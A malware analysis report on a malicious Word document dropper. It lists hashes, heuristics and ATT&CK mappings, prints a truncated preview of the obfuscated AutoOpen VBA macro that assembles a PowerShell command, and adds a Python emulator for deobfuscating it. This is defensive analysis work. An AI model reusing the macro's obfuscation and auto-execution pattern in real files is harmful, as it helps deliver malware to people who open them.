Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 25edbc83f140eafc…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 391.5 KB
Created: 2018-10-05 03:41:00
Authoring application: Microsoft Office Word
First seen: 2019-01-11
MD5: 6106fc132736a323bfae474fcb1fd08b
SHA-1: c45d7269e740752df954359f789c4973dd16b63b
SHA-256: 25edbc83f140eafc75cfa8c97b4913cb6153f55d97681d17550bd0b8c709cb01
Risk score: 290

Malware Insights

MITRE ATT&CK
T1059 Command and Scripting Interpreter
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution

The sample is a Word OLE document carrying a VBA project with an AutoOpen subroutine, so the macro runs as soon as the document is opened with macros enabled. The recovered source is padded with junk Const declarations and opaque predicates (If/ElseIf/Select Case on arithmetic such as 29 * 88 = 6229 or 26 - 30 = -4, and on string literals compared with themselves), and the live branches assemble a command string by concatenating short literals. The fragments contain PowerShell syntax ($name='...'; assignments and an $env: reference), the macro reads the SystemRoot environment variable through Environ(), and the heuristics report Shell() and CreateObject() calls, the usual sinks for such a string. Several names in the concatenations are never assigned; without Option Explicit they are Empty and contribute nothing, so they are noise rather than missing data. The SE_CLIPBOARD_COMMAND_LURE heuristic indicates the document text also tells the user to paste clipboard content into Run, PowerShell or cmd, a social-engineering path that does not depend on macros being enabled. The ClamAV detection Doc.Dropper.Agent-7079654-0 is consistent with dropper behaviour. Two findings need reading with care: the OLE_LEGACY_WORDBASIC_AUTOEXEC description says no modern VBA project was recovered, but olevba did extract one (macros.bas below), so that finding amounts to the AutoOpen marker alone; and the URLs under EMBEDDED_URL are XML namespace identifiers (RDF, Dublin Core, Adobe XMP, DrawingML) from embedded image metadata, not network indicators. The payload destination, if any, lies inside the obfuscated string and is not visible in the truncated listing. T1203 is attributed, but the report evidences no parser exploit; the documented execution path is the macro and the clipboard lure.

Heuristics (9)

  • CLAMAV_DETECTION [critical] ClamAV: Doc.Dropper.Agent-7079654-0
    ClamAV detected this file as malware: Doc.Dropper.Agent-7079654-0
  • OLE_VBA_MACROS [medium, 4 related findings] VBA macros detected
    Document contains VBA macro code
  • OLE_VBA_SHELL [critical] Shell() call in VBA
  • OLE_VBA_AUTOOPEN [high] AutoOpen macro
  • OLE_VBA_CREATEOBJ [high] CreateObject call
  • OLE_VBA_ENVIRON [low] Environ() call (env variable access)
  • SE_CLIPBOARD_COMMAND_LURE [high] Clipboard command execution lure
    Document tells the user to copy or paste clipboard content into Run, PowerShell, cmd, or another shell-like execution context
  • OLE_LEGACY_WORDBASIC_AUTOEXEC [medium] Legacy WordBasic auto-exec macro marker
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • EMBEDDED_URL [info] Embedded URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the following were found in document text (OLE body):
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#
    • http://ns.adobe.com/xap/1.0/
    • http://purl.org/dc/elements/1.1/
    • http://ns.adobe.com/xap/1.0/mm/
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#
    • http://ns.adobe.com/photoshop/1.0/
    • http://ns.adobe.com/tiff/1.0/
    • http://ns.adobe.com/exif/1.0/
    • http://schemas.openxmlformats.org/drawingml/2006/main

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 69386 bytes
SHA-256: 2c6bf572a5548ceee6fa0a0b3e42f766afcfb997a58d493736644d37b5f472e1

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Function iueif()
MsgBox ""
End Function
Sub AutoOpen()
Const iizeokv09 = False
Const kbwsfc_o = False
Const wrnoshw_f = False
Const uo_aj = False
Const ygcmwa = True
Const iutaysc0 = False
Const ykjrgcpko07 = False

If 29 * 88 = 6229 Then
Const kdaaxv8 = True
Const frzifyi22 = True
Const utzik = False
Const usrivkbt = False
Const iedvrld = False
Const ayrra = True
Const vrms_uuue = False
ElseIf 26 - 30 = -4 Then
edj_kel63 = "$oaibfxvjiowlxxw_iekfpfyiu"
Else
Const ixziidc = True
Const nqiyvlnjo = False
Const auen = False
Const dgaae3 = True
Const aavkdi = True
Const amgbzzfee5 = True
Const eya_y = True
Const kzxqxl = False
End If
Select Case "oxg_uvfet"
Case fb_yepwoy88
Const oh_esbg = True
Const pd_yixk = False
Const uwpnrw_yu = True
Case 10687
Const mpiqlja = True
Const kgukqt = False
Const iefqrke6 = True
Case "oxg_uvfet"
cfxl_gfv = "uoycid='org/C"
edj_kel63 = edj_kel63 + cfxl_gfv
End Select
Const iy_cntgsm = False

Select Case "sxnrui"
Case iiaxsqezu
Const ipfdayz = False
Case "sxnrui"
evpyiai = "J';$n"
Const dukh_a = False
Const iv_iwb = False
edj_kel63 = yaby + edj_kel63 + evpyiai + oahtaaa30
Case 20072
Const zmoeio = False
End Select
Const acugley4 = True

Select Case 81 * 88
Case 7128
anooioa = "atpxmhofkbbeb_huseu"
edj_kel63 = edj_kel63 + anooioa + vqton
End Select
Select Case 15 - 36
Case -21
edj_kel63 = edj_kel63 + "eei='ojqa';$owaizbpyuao" + ixcei
End Select
If 71 - 38 = 33 Then
kbezdzzytq = edj_kel63
Const uepe02 = False
y_qhab = "yyawtzcwqygabpqs"
kbezdzzytq = ev_vrz + kbezdzzytq + y_qhab
End If
Const twwfkh_sym = False

Select Case "uoaoyvr_j"
Case "uoaoyvr_j"
kbezdzzytq = hajsds + kbezdzzytq + "rqeeidno4=' =';$eikoia_yblegbmybniemxea_ogwepz" + xdiab
End Select
Const psiakke = True

Select Case 32 - 88
Case -56
iauah50 = "='e]$ojqa0';$mdroaen"
kbezdzzytq = kbezdzzytq + iauah50
End Select
Select Case "fzur95"
Case "fzur95"
puugo = "b_esuwo='ient).';$w"
kbezdzzytq = ajvgf_pxsvpo + kbezdzzytq + puugo + zhjwh
End Select
Const lcwao = False

Select Case 54 + 62
Case acnqf_cdq
Const snovlglksy0 = False
Const kcc_dgp = False
Const uitloclo = True
Case 116
gmuoalb = "vmbvwoxkjuhj"
kbezdzzytq = kbezdzzytq + gmuoalb
End Select
Const atujhsfo = False

Select Case "uonbxia"
Case "uonbxia"
kbezdzzytq = xayjh + kbezdzzytq + "t='($env:a';$mzoiuddeyaj"
Case 25741
Const udcuyugx = True
Const zyneoe = False
End Select
If 76 * 76 = 5776 Then
wft_ewhmncs = eidryso + kbezdzzytq
Const fnoodljwk = False
xuhiouy = "lqncmnrvpotqghzbopauau='($';$tco"
wft_ewhmncs = uydhm_dx + wft_ewhmncs + xuhiouy + oqgnsyjxv
Else
End If
Const xiqvwh = False
Const zshjcccwm = False

If 35 * 9 = 315 Then
okixpzcsjw00 = wft_ewhmncs
Const rvjqaglo = True
Const wochoeu = True
yupexujf = "zygiwfcyinfvnu"
okixpzcsjw00 = okixpzcsjw00 + yupexujf
End If
Const zqrtv = False

If 17 - 6 = 23 Then
ElseIf 90 - 18 = 72 Then
aqcyi = nckgw + okixpzcsjw00
Const oeoznne = True
vnopuaqenz6 = "_euqaocnlecylzi='br"
aqcyi = aqcyi + vnopuaqenz6 + a_rgzwur
Else
End If
If 56 - 49 = 7 Then
aqcyi = aqcyi + "';$q"
End If
Const yeuea = True

If 2219 >= 7013 Then
Const nocvezb = True
Const oqptte = True
Const mftti = False
Const ywau45 = True
Const aprgt = False
Const dgyaa = False
Else
t_rpssijwpl = Environ("SystemRoot")
End If
Const iqkmdt28 = True

If 9919 < 1932 Then
Const xdtbea = False
Const aiwob = True
Const tdmczx = True
Const ctp_zke = False
Const pvigvpsei = False
Const wlm_drj = True
Const ubwobxoxj = True
ElseIf 5087 < 7189 Then
phyktrv = aqcyi
Const eeee_e = True
uaegz = "cyeatbinwxsmezc_h"
phyktrv = phyktrv + uaegz
Else
Const zltot3 = False
Const ekwgejdr = True
Const oftudd = True

... (truncated)
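The listing above shows the whole obfuscation technique: junk Const lines, opaque predicates whose arithmetic decides which branch is live, string fragments concatenated in that branch, and undeclared names that VBA treats as Empty. The following script is an added example written for this page, not part of the report's tooling and not the sample's macro. It evaluates the predicates with VBA's Variant rules, follows the selected If/ElseIf/Select Case branches, resolves undeclared names to Empty, and records what reaches Shell() or CreateObject(). Everything in it is assumed rather than taken from the report: the function and class names (emulate, tokenize, Expr), the "%x%" placeholder returned for Environ(x), the set of statement shapes handled, and SAMPLE_MACRO, which is a constructed imitation of the listing's pattern with an invented result.

```python
"""Added example (not the report's tooling): emulate the macro's string assembly by evaluating
its opaque predicates, following the branches they select, treating undeclared names as VBA
Empty and recording what reaches Shell()/CreateObject(). Assumed: Environ(x) yields "%x%"."""
import re

TOKEN = re.compile(r'\s*(?:("(?:[^"]|"")*")|(\d+)|([A-Za-z_]\w*)|(<>|<=|>=|[-+*=<>(),]))')
SKIP = re.compile(r"^(Const|Dim|Attribute|Sub|Function|End Sub|End Function|MsgBox)\b", re.I)
ASSIGN = re.compile(r"^([A-Za-z_]\w*)\s*=\s*(.+)$")
SINK = re.compile(r"^(?:Call\s+)?(Shell|CreateObject)\b\s*\(?\s*(.+)$", re.I)
PREC = {"=": 0, "<>": 0, "<": 0, ">": 0, "<=": 0, ">=": 0, "+": 1, "-": 1, "*": 2}

def tokenize(src):
    out, pos, src = [], 0, src.strip()
    while pos < len(src):
        m = TOKEN.match(src, pos)
        if not m: raise ValueError(f"cannot tokenize {src[pos:]!r}")
        pos, (s, n, ident, op) = m.end(), m.groups()
        out.append(("str", s[1:-1].replace('""', '"')) if s is not None else ("num", int(n))
                   if n is not None else ("id", ident) if ident is not None else ("op", op))
    return out

def num(v):  # VBA numeric coercion: Empty -> 0, True -> -1, a string is a type mismatch
    if isinstance(v, str): raise ValueError(f"type mismatch: {v!r}")
    return 0 if v is None else (-1 if v else 0) if isinstance(v, bool) else v
def plus(a, b):  # VBA '+': concatenation when either side is a string (Empty acts as "")
    if isinstance(a, str) or isinstance(b, str): return (a or "") + (b or "")
    return num(a) + num(b)
def compare(op, a, b):  # Variant compare: Empty adopts the other side's type; str vs num only '<>'
    a = ("" if isinstance(b, str) else 0) if a is None else a
    b = ("" if isinstance(a, str) else 0) if b is None else b
    if isinstance(a, str) != isinstance(b, str): return op == "<>"
    if not isinstance(a, str): a, b = num(a), num(b)
    return {"=": a == b, "<>": a != b, "<": a < b, ">": a > b, "<=": a <= b, ">=": a >= b}[op]

class Expr:  # precedence-climbing evaluator over the token list
    def __init__(self, tokens, env): self.t, self.i, self.env = tokens, 0, env
    def peek(self, kind, val=None):
        t = self.t[self.i] if self.i < len(self.t) else (None, None)
        return t[1] if t[0] == kind and val in (None, t[1]) else None
    def take(self): self.i += 1; return self.t[self.i - 1][1]
    def expr(self, min_prec=0):
        v = self.factor()
        while (op := self.peek("op")) in PREC and PREC[op] >= min_prec:
            self.take(); r = self.expr(PREC[op] + 1)  # left-associative binary operators
            v = (plus(v, r) if op == "+" else num(v) - num(r) if op == "-"
                 else num(v) * num(r) if op == "*" else compare(op, v, r))
        return v
    def factor(self):
        if self.peek("op", "("): self.take(); v = self.expr(); self.take(); return v
        if self.peek("op", "-"): self.take(); return -num(self.factor())
        if self.peek("num") is not None or self.peek("str") is not None: return self.take()
        if self.peek("id") is None: raise ValueError("unexpected token")
        name = self.take()
        if name in ("True", "False"): return name == "True"
        if self.peek("op", "("):  # single-argument call; Environ() becomes a placeholder (assumed)
            self.take(); arg = self.expr(); self.take()
            return f"%{arg}%" if name.lower() == "environ" else None
        return self.env.get(name)  # undeclared variable -> Empty (None), so it concatenates as ""

def emulate(vba):
    env, sinks, frames = {}, [], []
    active = lambda: all(f["active"] for f in frames)
    ev = lambda e: Expr(tokenize(e), env).expr()
    for line in (l.strip() for l in vba.splitlines()):
        if not line or SKIP.match(line): continue
        kw, _, rest = line.partition(" "); kw = kw.lower()
        if line.lower() in ("end if", "end select"): frames.pop()
        elif kw in ("if", "select"):  # "If cond Then" / "Select Case expr" open a frame
            parent = active()
            frames.append({"parent": parent, "taken": False, "active": False,
                           "sel": ev(rest[5:]) if parent and kw == "select" else None})
            if kw == "if" and parent and num(ev(rest[:-5])):
                frames[-1]["active"] = frames[-1]["taken"] = True
        elif kw in ("elseif", "else", "case"):  # a branch runs only if none before it did
            f = frames[-1]
            f["active"] = bool(f["parent"] and not f["taken"] and (
                kw == "else" or rest.lower() == "else"
                or (kw == "elseif" and num(ev(rest[:-5])))
                or (kw == "case" and compare("=", f["sel"], ev(rest)))))
            f["taken"] = f["taken"] or f["active"]
        elif active() and (m := SINK.match(line)): sinks.append((m.group(1), ev(m.group(2))))
        elif active() and (m := ASSIGN.match(line)): env[m.group(1)] = ev(m.group(2))
    return {"vars": env, "sinks": sinks}

SAMPLE_MACRO = """If 29 * 88 = 6229 Then
Const junk1 = True
ElseIf 26 - 30 = -4 Then
s = "$p='pow"
End If
Select Case "k7"
Case undeclared_name
Case "k7"
s = never_set + s + "ershell';" + also_unset
End Select
If 2219 >= 7013 Then
Else
s = s + "$e='" + Environ("SystemRoot") + "';"
End If
Shell s"""  # constructed imitation of the listing's pattern, not the sample's own macro
```

emulate(SAMPLE_MACRO)["sinks"] returns [("Shell", "$p='powershell';$e='%SystemRoot%';")]: the dead If branch and the non-matching Case arms are skipped, the two undeclared names vanish as Empty, and the Environ() placeholder marks where a real run would substitute the environment variable. Pointing emulate() at the extracted macros.bas is the obvious next step; the evaluator handles the statement shapes visible above (including negative Case literals and a parenthesised call), evaluates only the first argument of a multi-argument Shell() call, and raises ValueError on anything it does not recognise rather than guessing.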